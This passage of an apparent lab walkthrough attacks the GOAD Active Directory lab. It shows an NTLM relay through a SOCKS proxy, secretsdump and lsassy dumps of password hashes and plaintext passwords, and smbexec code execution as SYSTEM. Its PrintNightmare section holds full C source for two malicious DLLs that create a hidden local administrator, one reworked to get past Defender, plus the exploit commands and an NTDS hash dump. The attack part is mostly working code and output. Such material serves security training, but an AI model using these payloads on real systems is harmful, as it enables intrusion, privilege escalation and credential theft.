After waiting about 5 minutes with both tools running, ntlmrelayx shows the relayed connections:

┌──(bolke㉿kali)-[~/htb]
└─$ impacket-ntlmrelayx -tf relay.txt --no-http-server -smb2support -socks
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client SMB loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to hosts in targetfile
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] LDAP Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] LDAPS Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server on port 445
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay enabled

[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>  * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
 * Debug mode: off

ntlmrelayx> [*] (SMB): Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[]
[*] (SMB): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.23
[*] (SMB): Authenticating connection from NORTH/EDDARD.STARK@192.168.56.11 against smb://192.168.56.23 SUCCEED [1]
[*] SOCKS: Adding SMB://NORTH/EDDARD.STARK@192.168.56.23(445) [1] to active SOCKS connection. Enjoy
[]
[*] (SMB): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, attacking target smb://192.168.56.22
[*] (SMB): Authenticating connection from NORTH/EDDARD.STARK@192.168.56.11 against smb://192.168.56.22 SUCCEED [2]
[*] SOCKS: Adding SMB://NORTH/EDDARD.STARK@192.168.56.22(445) [2] to active SOCKS connection. Enjoy
[*] All targets processed!
[*] (SMB): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left!
[*] (SMB): Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] (SMB): Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] (SMB): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left!
[*] (SMB): Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
[*] All targets processed!
[*] (SMB): Connection from NORTH/EDDARD.STARK@192.168.56.11 controlled, but there are no more targets left!
[*] (SMB): Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
socks
Protocol  Target         Username            AdminStatus  Port  ID 
--------  -------------  ------------------  -----------  ----  ---
SMB       192.168.56.23  NORTH/EDDARD.STARK  FALSE        445   1  
SMB       192.168.56.22  NORTH/EDDARD.STARK  TRUE         445   2  
ntlmrelayx> [*] SOCKS: Proxying client session for NORTH/EDDARD.STARK@192.168.56.22(445)

.

The relayed sessions are now held open behind the SOCKS proxy, so they can be reused without ever knowing eddard.stark’s password. The AdminStatus column of the socks table is the key detail: eddard.stark is a local administrator on castelblack (192.168.56.22) but not on braavos (192.168.56.23), so castelblack is the session to use for secrets dumping and code execution.

Next, connect through proxychains and run secretsdump. The relayed session already carries the authentication, which is why -no-pass is used.

secretsdump gets us the SAM database, the LSA cached logons, the machine account and some DPAPI information:

┌──(bolke㉿kali)-[~/htb]
└─$ proxychains4 impacket-secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x881f6798ad7e885dd9ceb640861b988e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
puck:1002:aad3b435b51404eeaad3b435b51404ee:0149b059adfce2da6ae4319fbcf100f0:::
[*] Dumping cached domain logon information (domain/username:hash)
NORTH.SEVENKINGDOMS.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a: (2026-03-27 17:09:47+00:00)
NORTH.SEVENKINGDOMS.LOCAL/jon.snow:$DCC2$10240#jon.snow#82fdcc982f02b389a002732efaca9dc5: (2026-04-06 07:36:01+00:00)
NORTH.SEVENKINGDOMS.LOCAL/robb.stark:$DCC2$10240#robb.stark#f19bfb9b10ba923f2e28b733e5dd1405: (2026-04-06 06:17:57+00:00)
NORTH.SEVENKINGDOMS.LOCAL/eddard.stark:$DCC2$10240#eddard.stark#520d06163cf6a619bfecfa22d802c34f: (2026-04-01 13:34:42+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NORTH\CASTELBLACK$:aes256-cts-hmac-sha1-96:5d5f0a147176cb3ccf5e01e722280d57e9efe94a7fd0f379701d4748c79ae47d
NORTH\CASTELBLACK$:aes128-cts-hmac-sha1-96:19e83eb22e90637a8c016fb2314f44e8
NORTH\CASTELBLACK$:des-cbc-md5:0404499b9dce1694
NORTH\CASTELBLACK$:plain_password_hex:3e005d004e0024002600390020003400580034006b003700750023003000620069006a002b003f00720032002000410062007600720074004800750056004d005c0065002f0071006a005e0053002d00300052004a003c0054003c007a0052002e002f00480052005500330047004e0053002600600052005a004800450027003f00640023002a004f006900280066004a0039006e0054003800370027002c0066006f0070006b0042003b00400042002d00320031004b0036003c0026002f00260076002200360064002e002e003d0020005000280045003700680073003400500077004d004400580022006f004200
NORTH\CASTELBLACK$:aad3b435b51404eeaad3b435b51404ee:0faddc16c56adadd3e13a71c9efba7bc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x7e29fa8b6d22022780635b8fff164499ab43726f
dpapi_userkey:0x2084984033981076dddd9d84019330f46238bc67
[*] NL$KM 
 0000   22 34 01 76 01 70 30 93  88 A7 6B B2 87 43 59 69   "4.v.p0...k..CYi
 0010   0E 41 BD 22 0A 0C CC 23  3A 5B B6 74 CB 90 D6 35   .A."...#:[.t...5
 0020   14 CA D8 45 4A F0 DB 72  D5 CF 3B A1 ED 7F 3A 98   ...EJ..r..;...:.
 0030   CD 4D D6 36 6A 35 24 2D  A0 EB 0F 8E 3F 52 81 C9   .M.6j5$-....?R..
NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9
[*] _SC_MSSQL$SQLEXPRESS 
north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

.

  • The SAM database holds the local accounts. We ignore vagrant, the default user used to set up the lab.
  • The important item is the NT hash of the local Administrator (RID 500), usable directly for pass-the-hash.
  • We also get the LSA cache (DCC2) of the last users who logged on (by default Windows keeps the last 10). It lets those users log on even when the domain controller is unreachable. These cached credentials can be cracked offline with hashcat (mode 2100), but it is very slow.
  • Finally we get the hash of the computer account. Sometimes a domain-joined computer yields no useful domain accounts at all, but with this hash you still have an account on the domain.

Next, let’s use lsassy to get what LSASS holds:    https://github.com/login-securite/lsassy

  • lsassy retrieves the credentials cached in the LSASS process.
  • Domain account credentials live in LSASS, so dumping it can yield more domain accounts and privileges.
  • lsassy dumps LSASS remotely (far more convenient than running procdump, downloading the dump and parsing it locally with pypykatz or mimikatz); it performs the dump and reads its contents for you, and only transfers the useful part of the dump to save time. (lsassy also exists as a nxc/cme module.)
┌──(bolke㉿kali)-[~/htb]
└─$ proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
192.168.56.22 - NORTH\robb.stark                                    [NT] 831486ac7f26860c9e2f51ac91e1a07a | [SHA1] 3bea28f1c440eed7be7d423cefebb50322ed7b6c                                                                      
192.168.56.22 - NORTH\CASTELBLACK$                                  [NT] 0faddc16c56adadd3e13a71c9efba7bc | [SHA1] 1d9a69e9e5fbdf5a0b658b2dc638d82097a35f70                                                                      
192.168.56.22 - north.sevenkingdoms.local\CASTELBLACK$              [PWD] >]N$&9 4X4k7u#0bij+?r2 AbvrtHuVM\e/qj^S-0RJ<T<zR./HRU3GNS&`RZHE'?d#*Oi(fJ9nT87',fopkB;@B-21K6<&/&v"6d..= P(E7hs4PwMDX"oB                               
192.168.56.22 - NORTH\sql_svc                                       [NT] 84a5092f53390ea48d660be52b93b804 | [SHA1] 9fd961155e28b1c6f9b3859f32f4779ad6a06404                                                                      
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\sql_svc                   [PWD] YouWillNotKerboroast1ngMeeeeee                                              
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\robb.stark                [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:17 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_de6981bd_20260406161757.kirbi)                                                          
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\robb.stark                [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:17 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_a99ebdc4_20260406161757.kirbi)                                                          
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_1b7a94a3_20260406161552.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_ad351161_20260406161552.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_e1c864e7_20260406161535.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_8f5807b4_20260406161535.kirbi)                                                        
14 Kerberos tickets written to /home/bolke/.config/lsassy/tickets
5 masterkeys saved to /home/bolke/.config/lsassy/masterkeys.txt

.

My third favourite tool for retrieving Windows secrets from Linux is donPAPI. It collects DPAPI-protected data and other stored passwords (files, browsers, scheduled tasks, ...). It does not touch LSASS, so it is stealthier and works most of the time even with AV or EDR enabled on the target.

  • donPAPI gives us the stored password for the SQL service: sql_svc:YouWillNotKerboroast1ngMeeeeee
  • We also get robb.stark’s password, thanks to a scheduled task configured on this computer.

 

Smbclient

  • Connect directly to the SMB server through the relayed session with impacket-smbclient:
┌──(bolke㉿kali)-[~/htb]
└─$ proxychains impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
Type help for list of commands
# shares
ADMIN$
all
C$
IPC$
public
# use C$
# ls
drw-rw-rw-          0  Fri Mar 27 16:39:32 2026 $Recycle.Bin
drw-rw-rw-          0  Fri Mar 27 19:43:14 2026 AD
drw-rw-rw-          0  Fri Mar 27 18:26:34 2026 Config.Msi
-rw-rw-rw-        660  Fri Mar 27 17:31:13 2026 dns_log.txt
drw-rw-rw-          0  Wed May 12 13:38:56 2021 Documents and Settings
drw-rw-rw-          0  Fri Mar 27 17:51:29 2026 inetpub
-rw-rw-rw-  536870912  Mon Apr  6 15:14:48 2026 pagefile.sys
drw-rw-rw-          0  Wed May 12 06:56:39 2021 PerfLogs
drw-rw-rw-          0  Fri Mar 27 18:25:32 2026 Program Files
drw-rw-rw-          0  Fri Mar 27 18:25:46 2026 Program Files (x86)
drw-rw-rw-          0  Fri Mar 27 17:57:05 2026 ProgramData
drw-rw-rw-          0  Fri Mar 27 16:38:46 2026 Recovery
drw-rw-rw-          0  Fri Mar 27 17:55:09 2026 setup
drw-rw-rw-          0  Fri Mar 27 18:32:12 2026 shares
drw-rw-rw-          0  Wed May 12 13:38:15 2021 System Volume Information
drw-rw-rw-          0  Mon Apr  6 12:16:00 2026 tmp
drw-rw-rw-          0  Mon Apr  6 12:33:54 2026 Users
drw-rw-rw-          0  Wed Apr  1 09:46:53 2026 Windows
# 

.

Code execution: smbexec or atexec

smbexec creates a temporary service on the target (over the svcctl pipe) that runs each command through cmd.exe and writes the output to the C$ share, which is why the debug lines below show a .bat file being created and deleted under %SYSTEMROOT% for every command:

┌──(bolke㉿kali)-[~/htb]
└─$ proxychains impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:192.168.56.22[\pipe\svcctl]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[+] Executing %COMSPEC% /Q /c echo cd  ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\gPFLQSYV.bat & %COMSPEC% /Q /c %SYSTEMROOT%\gPFLQSYV.bat & del %SYSTEMROOT%\gPFLQSYV.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\emBwHcPK.bat & %COMSPEC% /Q /c %SYSTEMROOT%\emBwHcPK.bat & del %SYSTEMROOT%\emBwHcPK.bat
nt authority\system

C:\Windows\system32>hostname
[+] Executing %COMSPEC% /Q /c echo hostname ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\WLlQBNSv.bat & %COMSPEC% /Q /c %SYSTEMROOT%\WLlQBNSv.bat & del %SYSTEMROOT%\WLlQBNSv.bat
castelblack

C:\Windows\system32>

.

 

With the relayed eddard.stark session we are SYSTEM on castelblack, and the reused Administrator hash already gave us administrative access to Winterfell, the north domain controller.

Extra

PrintNightmare

To exploit PrintNightmare (CVE-2021-1675 / CVE-2021-34527) we first check whether the Print Spooler service is running on the targets:

bolke@hacky:~$ nxc smb 192.168.56.10-23 -M spooler
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SPOOLER     192.168.56.12   445    MEEREEN          Spooler service enabled
SPOOLER     192.168.56.10   445    KINGSLANDING     Spooler service enabled
SPOOLER     192.168.56.23   445    BRAAVOS          Spooler service enabled
SPOOLER     192.168.56.11   445    WINTERFELL       Spooler service enabled
SPOOLER     192.168.56.22   445    CASTELBLACK      Spooler service enabled
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
bolke@hacky:~$ 

.

Prepare the DLL

  • The exploit makes the spooler load an attacker-supplied "printer driver" DLL as SYSTEM, so DllMain is where the payload goes.
  • Our payload creates a user and adds it to the local Administrators group.
  • Create the file nightmare.c:

.

#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload: create a local user and put it in the local Administrators group.
 * system() spawns cmd.exe and net.exe from the spooler process, which is noisy:
 * further down, Defender catches the localgroup step on the Server 2019 host. */
int RunCMD(void)
{
    system("net users pnightmare Passw0rd123. /add");
    system("net localgroup administrators pnightmare /add");
    return 0;
}

/* The spooler loads this DLL as a printer driver under SYSTEM, so the payload
 * runs from DllMain as soon as the DLL is mapped (DLL_PROCESS_ATTACH). */
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    (void)hModule;
    (void)lpReserved;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

.

Compile it:

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Exploit on old and vulnerable windows server 2016 (meereen)

  • Clone the exploit

git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare

  • Prepare a smb share with the dll
┌──(bolke㉿kali)-[~/htb]
└─$ impacket-smbserver -smb2support ATTACKERSHARE .
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0

.

Before the exploit, there is no user pnightmare:
nxc smb meereen.essos.local -u pnightmare -p 'Passw0rd123.'
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)                                       
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\pnightmare:Passw0rd123. STATUS_LOGON_FAILURE 

Braavos is an up-to-date Windows Server 2016, so the exploit will not work there (you get the same error if you try castelblack in the north domain).

Exploit on Meereen

┌──(bolke㉿kali)-[~/htb]
└─$ python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.56.104\ATTACKERSHARE\nightmare.dll'
[*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.56.104\ATTACKERSHARE\nightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed

The exploit worked: pnightmare now exists and is a local administrator (Pwn3d!):

nxc smb meereen.essos.local -u pnightmare -p 'Passw0rd123.'
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)                                       
SMB         192.168.56.12   445    MEEREEN          [+] essos.local\pnightmare:Passw0rd123. (Pwn3d!)

.

bolke@hacky:~$ ewp -i meereen.essos.local -u pnightmare -p Passw0rd123.
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'meereen.essos.local:5985' as 'pnightmare'
evil-winrm-py PS C:\Users\pnightmare\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            daenerys.targaryen       DefaultAccount           
drogon                   Guest                    jorah.mormont            
khal.drogo               krbtgt                   missandei                
pnightmare               sql_svc                  vagrant                  
viserys.targaryen        
The command completed with one or more errors.

Exploit on a vulnerable Windows Server 2019 (winterfell)

  • Now try the same exploit on a vulnerable Windows Server 2019
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.56.104\ATTACKERSHARE\nightmare.dll'

  • It works too, but the user is not in the administrators group 🙁
  • This is not due to the exploit itself: our DLL creates the user and is caught by Defender at the moment it adds that user to the administrators group.

 

  • Good to know: after a few failures the spooler service will be stopped by Defender, and there is no more exploit for you until someone restarts the server or the spooler service.
  • Let's change the payload to other code (source: https://github.com/newsoft/adduser )
/*
 * ADDUSER.C: creating a Windows user programmatically.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <stdio.h>      // _tprintf expands to wprintf/printf
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>


DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256;    // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("pnightmare2");                // username
    ud.usri1_password    = _T("Test123456789!");             // password
    ud.usri1_priv        = USER_PRIV_USER;                   // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;    // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,            // local server
        1,                // information level
        (LPBYTE)&ud,
        NULL            // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    _tprintf(_T("NetUserAdd OK\r\n"));

    // Get user SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cbDomain,       // Domain size
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                        // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}
  • With this payload we can bypass Defender and add our user as administrator
  • compile
x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32
  • prepare the share
smbserver.py -smb2support ATTACKERSHARE .
  • relaunch the exploit
┌──(bolke㉿kali)-[~/htb]
└─$ python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@winterfell.north.sevenkingdoms.local '\\192.168.56.104\ATTACKERSHARE\pnightmare2.dll'
[*] Connecting to ncacn_np:winterfell.north.sevenkingdoms.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.56.104\ATTACKERSHARE\pnightmare2.dll
[*] Try 1...
[*] Stage0: 0
[*] Stage1: 0
[+] Exploit Completed

And enjoy your new admin account by dumping the NTDS 🙂

evil-winrm-py PS C:\Users\pnightmare\Documents> exit
bolke@hacky:~$ nxc smb winterfell.north.sevenkingdoms.local -u pnightmare2 -p 'Test123456789!' --ntds
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\pnightmare2:Test123456789! (Pwn3d!)
SMB         192.168.56.11   445    WINTERFELL       [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.11   445    WINTERFELL       Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
SMB         192.168.56.11   445    WINTERFELL       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.11   445    WINTERFELL       krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fe426180f0516e83820b4f6a13c3cf6a:::
SMB         192.168.56.11   445    WINTERFELL       vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         192.168.56.11   445    WINTERFELL       arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
SMB         192.168.56.11   445    WINTERFELL       eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
SMB         192.168.56.11   445    WINTERFELL       catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
SMB         192.168.56.11   445    WINTERFELL       robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
SMB         192.168.56.11   445    WINTERFELL       sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
SMB         192.168.56.11   445    WINTERFELL       brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
SMB         192.168.56.11   445    WINTERFELL       rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
SMB         192.168.56.11   445    WINTERFELL       hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
SMB         192.168.56.11   445    WINTERFELL       jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB         192.168.56.11   445    WINTERFELL       samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
